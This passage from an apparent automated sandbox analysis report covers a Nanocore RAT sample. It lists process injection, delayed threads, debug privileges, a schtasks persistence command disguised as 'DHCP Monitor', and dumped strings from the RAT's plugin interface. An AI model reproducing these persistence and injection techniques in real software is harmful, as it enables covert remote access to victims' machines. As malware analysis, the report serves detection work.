Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: LFEs2N6DU4.exe, 0000000D.00000002.530807434.000000000106E000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Memory written: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Memory written: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Memory written: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Memory written: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Memory written: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe base: A1A008	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 400000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 402000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 420000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 422000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 8B8008	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 400000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 402000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 420000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 422000	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 3B8008	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Memory written: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Users\user\AppData\Local\Temp\dhcpmon.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA85B.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpAD7D.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Users\user\AppData\Local\Temp\dhcpmon.exe C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Users\user\AppData\Local\Temp\dhcpmon.exe C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Jump to behavior

Source: LFEs2N6DU4.exe, 0000000D.00000002.531681801.0000000001730000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: LFEs2N6DU4.exe, 0000000D.00000002.535410231.0000000002EF0000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: LFEs2N6DU4.exe, 0000000D.00000002.531681801.0000000001730000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: LFEs2N6DU4.exe, 0000000D.00000002.531681801.0000000001730000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: LFEs2N6DU4.exe, 0000000D.00000002.538650461.000000000655C000.00000004.00000010.sdmp	Binary or memory string: Program Managerx
Source: LFEs2N6DU4.exe, 0000000D.00000002.531681801.0000000001730000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: LFEs2N6DU4.exe, 0000000D.00000002.535410231.0000000002EF0000.00000004.00000001.sdmp	Binary or memory string: Program Manager@:C
Source: LFEs2N6DU4.exe, 0000000D.00000002.538833028.00000000069DD000.00000004.00000010.sdmp	Binary or memory string: hProgram Managerx
Source: LFEs2N6DU4.exe, 0000000D.00000002.538556575.000000000632B000.00000004.00000010.sdmp	Binary or memory string: Program Managerx"(
Source: LFEs2N6DU4.exe, 0000000D.00000002.538900589.0000000006FDD000.00000004.00000010.sdmp	Binary or memory string: hProgram Manager

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Queries volume information: C:\Users\user\Desktop\LFEs2N6DU4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dhcpmon.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dhcpmon.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.3374bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c04bed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.534572652.0000000002DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: LFEs2N6DU4.exe, 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: LFEs2N6DU4.exe, 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: LFEs2N6DU4.exe, 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: LFEs2N6DU4.exe, 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: LFEs2N6DU4.exe, 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: LFEs2N6DU4.exe, 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe, 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.R